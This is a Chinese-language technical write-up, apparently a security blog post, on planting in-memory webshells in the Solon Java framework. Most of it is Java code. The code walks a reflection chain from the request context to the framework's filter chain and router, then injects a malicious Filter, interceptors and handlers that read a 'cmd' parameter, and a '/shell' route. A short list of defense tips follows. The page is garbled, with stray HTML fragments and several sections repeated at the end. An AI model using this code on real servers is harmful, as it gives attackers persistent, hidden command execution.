Solon框架内存马构造技术分析<\/h1>

1. Solon框架简介<\/h2>
Solon是一个Java应用开发框架，类似Spring Boot，号称"纯血国产"应用开发框架，具有克制、高效、开放、生态等特点。<\/p>
官网地址: https:\/\/solon.noear.org<\/p>

2. Solon请求处理流程<\/h2>

Solon的Web请求处理会经过四个主要阶段:<\/p>

过滤器(Filter)<\/li>
路由拦截器(RouterInterceptor)<\/li>
处理器(Handler)<\/li>

拦截器(Interceptor)<\/li> <\/ol>

3. 内存马构造方法<\/h2>

3.1 Filter内存马构造<\/h3>

3.1.1 基本原理<\/h4>
通过获取内存中的`ChainManager<\/code>对象，调用其addFilter<\/code>方法动态添加恶意Filter。<\/p>`

3.1.2 实现步骤<\/h4>

创建恶意Filter类:<\/li>
<\/ol>
public<\/span> class<\/span> EvilFilter<\/span> implements<\/span> Filter {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doFilter<\/span>(<\/span>Context ctx,<\/span> FilterChain chain)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"this is a evilfilter!"<\/span>);<\/span>
<\/span><\/span>        chain.<\/span>doFilter<\/span>(<\/span>ctx);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
获取ChainManager对象:<\/li>
<\/ol>
\/\/ 使用java-object-searcher搜索ChainManager
<\/span><\/span><\/span><\/span>List<<\/span>Keyword><\/span> keys =<\/span> new<\/span> ArrayList<>();<\/span>
<\/span><\/span>keys.<\/span>add<\/span>(<\/span>new<\/span> Keyword.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"_chainManager"<\/span>).<\/span>build<\/span>());<\/span>
<\/span><\/span>SearchRequstByBFS searcher =<\/span> new<\/span> SearchRequstByBFS(<\/span>Thread.<\/span>currentThread<\/span>(),<\/span> keys);<\/span>
<\/span><\/span>searcher.<\/span>setIs_debug<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>searcher.<\/span>setMax_search_depth<\/span>(<\/span>20<\/span>);<\/span>
<\/span><\/span>searcher.<\/span>setReport_save_path<\/span>(<\/span>"C:\\Users\\XXX\\Desktop\\demo"<\/span>);<\/span>
<\/span><\/span>searcher.<\/span>searchObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>
通过反射获取并添加Filter:<\/li>
<\/ol>
@Mapping<\/span>(<\/span>"\/addfiltermemshell"<\/span>)<\/span>
<\/span><\/span>public<\/span> String addFiltermemshell<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    Context context =<\/span> Context.<\/span>current<\/span>();<\/span>
<\/span><\/span>    \/\/ 通过反射获取ChainManager
<\/span><\/span><\/span><\/span>    Class<?><\/span> superclass =<\/span> context.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>();<\/span>
<\/span><\/span>    Field attrMap =<\/span> superclass.<\/span>getDeclaredField<\/span>(<\/span>"attrMap"<\/span>);<\/span>
<\/span><\/span>    attrMap.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Map o =<\/span> (<\/span>Map)<\/span> attrMap.<\/span>get<\/span>(<\/span>context);<\/span>
<\/span><\/span>    Object actiondefault =<\/span> o.<\/span>get<\/span>(<\/span>"ATTR_MAIN_HANDLER"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    Class<?><\/span> aClass =<\/span> actiondefault.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>    Field bWrap =<\/span> aClass.<\/span>getDeclaredField<\/span>(<\/span>"bWrap"<\/span>);<\/span>
<\/span><\/span>    bWrap.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Object o1 =<\/span> bWrap.<\/span>get<\/span>(<\/span>actiondefault);<\/span>
<\/span><\/span>    
<\/span><\/span>    Class<?><\/span> aClass1 =<\/span> o1.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>    Field context1 =<\/span> aClass1.<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span>
<\/span><\/span>    context1.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Object o2 =<\/span> context1.<\/span>get<\/span>(<\/span>o1);<\/span>
<\/span><\/span>    
<\/span><\/span>    Class<?><\/span> aClass2 =<\/span> o2.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>();<\/span>
<\/span><\/span>    Field app =<\/span> aClass2.<\/span>getDeclaredField<\/span>(<\/span>"app"<\/span>);<\/span>
<\/span><\/span>    app.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Object o3 =<\/span> app.<\/span>get<\/span>(<\/span>o2);<\/span>
<\/span><\/span>    
<\/span><\/span>    Class<?><\/span> aClass3 =<\/span> o3.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>();<\/span>
<\/span><\/span>    Field chainManager =<\/span> aClass3.<\/span>getDeclaredField<\/span>(<\/span>"_chainManager"<\/span>);<\/span>
<\/span><\/span>    chainManager.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    ChainManager o4 =<\/span> (<\/span>ChainManager)<\/span> chainManager.<\/span>get<\/span>(<\/span>o3);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 添加恶意Filter
<\/span><\/span><\/span><\/span>    o4.<\/span>addFilter<\/span>(<\/span>new<\/span> EvilFilter(),<\/span> 0<\/span>);<\/span>
<\/span><\/span>    return<\/span> "Filtermemshell add successfully!"<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 其他类型内存马构造<\/h3>
3.2.1 ActionReturnHandler内存马<\/h4>
public<\/span> class<\/span> EvilActionReturnHandler<\/span> implements<\/span> ActionReturnHandler {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> boolean<\/span> matched<\/span>(<\/span>Context ctx,<\/span> Class<?><\/span> returnType)<\/span> {<\/span>
<\/span><\/span>        return<\/span> true<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> returnHandle<\/span>(<\/span>Context ctx,<\/span> Action action,<\/span> Object returnValue)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        String cmd =<\/span> ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        \/\/ 具体恶意逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2.2 ActionExecuteHandler内存马<\/h4>
public<\/span> class<\/span> EvilActionExecuteHandler<\/span> implements<\/span> ActionExecuteHandler {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> boolean<\/span> matched<\/span>(<\/span>Context ctx,<\/span> String mime)<\/span> {<\/span>
<\/span><\/span>        String cmd =<\/span> ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        \/\/ 具体恶意逻辑
<\/span><\/span><\/span><\/span>        \/\/ Runtime.getRuntime().exec("cmd")
<\/span><\/span><\/span><\/span>        return<\/span> false<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> Object[]<\/span> resolveArguments<\/span>(<\/span>Context ctx,<\/span> Object target,<\/span> MethodWrap mWrap)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        return<\/span> new<\/span> Object[<\/span>0<\/span>];<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> Object executeHandle<\/span>(<\/span>Context ctx,<\/span> Object target,<\/span> MethodWrap mWrap)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2.3 RouterInterceptor内存马<\/h4>
public<\/span> class<\/span> EvilRouterInterceptor<\/span> implements<\/span> RouterInterceptor {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> PathRule pathPatterns<\/span>()<\/span> {<\/span>
<\/span><\/span>        return<\/span> new<\/span> PathRule().<\/span>include<\/span>(<\/span>"\/cmd"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doIntercept<\/span>(<\/span>Context ctx,<\/span> Handler mainHandler,<\/span> RouterInterceptorChain chain)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>        String cmd =<\/span> ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        \/\/ 具体恶意逻辑
<\/span><\/span><\/span><\/span>        chain.<\/span>doIntercept<\/span>(<\/span>ctx,<\/span> mainHandler);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.3 Controller内存马构造<\/h3>
3.3.1 基本原理<\/h4>
通过获取RouterDefault<\/code>对象，调用其add<\/code>方法动态添加恶意路由。<\/p>
3.3.2 实现步骤<\/h4>

创建恶意Controller类:<\/li>
<\/ol>
public<\/span> class<\/span> Evil<\/span> {<\/span>
<\/span><\/span>    public<\/span> void<\/span> shell<\/span>()<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        \/\/ 具体恶意逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
获取RouterDefault并添加路由:<\/li>
<\/ol>
@Mapping<\/span>(<\/span>"\/addcontrollermemshell"<\/span>)<\/span>
<\/span><\/span>public<\/span> String addcontrollermemshell<\/span>()<\/span> throws<\/span> NoSuchFieldException,<\/span> IllegalAccessException,<\/span> NoSuchMethodException {<\/span>
<\/span><\/span>    Context context =<\/span> Context.<\/span>current<\/span>();<\/span>
<\/span><\/span>    \/\/ 通过反射获取RouterDefault
<\/span><\/span><\/span><\/span>    Class<?><\/span> superclass =<\/span> context.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>();<\/span>
<\/span><\/span>    Field attrMap =<\/span> superclass.<\/span>getDeclaredField<\/span>(<\/span>"attrMap"<\/span>);<\/span>
<\/span><\/span>    attrMap.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Map o =<\/span> (<\/span>Map)<\/span> attrMap.<\/span>get<\/span>(<\/span>context);<\/span>
<\/span><\/span>    Object actiondefault =<\/span> o.<\/span>get<\/span>(<\/span>"ATTR_MAIN_HANDLER"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    Class<?><\/span> aClass =<\/span> actiondefault.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>    Field bWrap =<\/span> aClass.<\/span>getDeclaredField<\/span>(<\/span>"bWrap"<\/span>);<\/span>
<\/span><\/span>    bWrap.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Object o1 =<\/span> bWrap.<\/span>get<\/span>(<\/span>actiondefault);<\/span>
<\/span><\/span>    
<\/span><\/span>    Class<?><\/span> aClass1 =<\/span> o1.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>    Field context1 =<\/span> aClass1.<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span>
<\/span><\/span>    context1.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    AppContext o2 =<\/span> (<\/span>AppContext)<\/span> context1.<\/span>get<\/span>(<\/span>o1);<\/span>
<\/span><\/span>    
<\/span><\/span>    Class<?><\/span> aClass2 =<\/span> o2.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>();<\/span>
<\/span><\/span>    Field app =<\/span> aClass2.<\/span>getDeclaredField<\/span>(<\/span>"app"<\/span>);<\/span>
<\/span><\/span>    app.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Object o3 =<\/span> app.<\/span>get<\/span>(<\/span>o2);<\/span>
<\/span><\/span>    
<\/span><\/span>    Class<?><\/span> aClass3 =<\/span> o3.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>();<\/span>
<\/span><\/span>    Field chainManager =<\/span> aClass3.<\/span>getDeclaredField<\/span>(<\/span>"_router"<\/span>);<\/span>
<\/span><\/span>    chainManager.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    RouterDefault o4 =<\/span> (<\/span>RouterDefault)<\/span> chainManager.<\/span>get<\/span>(<\/span>o3);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 构造并添加恶意路由
<\/span><\/span><\/span><\/span>    BeanWrap beanWrap =<\/span> new<\/span> BeanWrap(<\/span>o2,<\/span> Evil.<\/span>class<\/span>);<\/span>
<\/span><\/span>    Method shell =<\/span> Evil.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"shell"<\/span>);<\/span>
<\/span><\/span>    ActionDefault actionDefault =<\/span> new<\/span> ActionDefault(<\/span>beanWrap,<\/span> shell);<\/span>
<\/span><\/span>    o4.<\/span>add<\/span>(<\/span>"\/shell"<\/span>,<\/span> MethodType.<\/span>ALL<\/span>,<\/span> 0<\/span>,<\/span> actionDefault);<\/span>
<\/span><\/span>    
<\/span><\/span>    return<\/span> "controllermemshell added successfully!"<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 关键点总结<\/h2>

ChainManager<\/strong>是Filter内存马的关键对象，通过反射获取后可以动态添加Filter<\/li>
RouterDefault<\/strong>是Controller内存马的关键对象，存储了所有路由信息<\/li>
AppContext<\/strong>是获取各种管理对象的关键入口<\/li>
Context.current()<\/strong>可以获取当前请求上下文，是反射链的起点<\/li>
通过java-object-searcher<\/strong>可以搜索内存中的关键对象<\/li>
<\/ol>
5. 防御建议<\/h2>

监控动态添加的Filter、Interceptor和Controller<\/li>
限制反射调用权限<\/li>
定期检查内存中的异常组件<\/li>
使用RASP等运行时防护产品<\/li>
<\/ol>
6. 参考链接<\/h2>

https:\/\/xz.aliyun.com\/t\/15273<\/li>
https:\/\/solon.noear.org<\/li>
<\/ul>

Solon框架内存马构造技术分析<\/h1>

1. Solon框架简介<\/h2> Solon是一个Java应用开发框架，类似Spring Boot，号称"纯血国产"应用开发框架，具有克制、高效、开放、生态等特点。<\/p> 官网地址: https:\/\/solon.noear.org<\/p>

3. 内存马构造方法<\/h2>

3.1 Filter内存马构造<\/h3>

3.1.1 基本原理<\/h4> 通过获取内存中的ChainManager<\/code>对象，调用其addFilter<\/code>方法动态添加恶意Filter。<\/p>

3.2 其他类型内存马构造<\/h3>

3.3 Controller内存马构造<\/h3>

3.3.1 基本原理<\/h4> 通过获取RouterDefault<\/code>对象，调用其add<\/code>方法动态添加恶意路由。<\/p>

6. 参考链接<\/h2> https:\/\/xz.aliyun.com\/t\/15273<\/li> https:\/\/solon.noear.org<\/li> <\/ul>

1. Solon框架简介<\/h2>
Solon是一个Java应用开发框架，类似Spring Boot，号称"纯血国产"应用开发框架，具有克制、高效、开放、生态等特点。<\/p>
官网地址: https:\/\/solon.noear.org<\/p>

3.1.1 基本原理<\/h4>
通过获取内存中的`ChainManager<\/code>对象，调用其addFilter<\/code>方法动态添加恶意Filter。<\/p>`

3.3.1 基本原理<\/h4>
通过获取`RouterDefault<\/code>对象，调用其add<\/code>方法动态添加恶意路由。<\/p>`

6. 参考链接<\/h2>

https:\/\/xz.aliyun.com\/t\/15273<\/li>
https:\/\/solon.noear.org<\/li> <\/ul>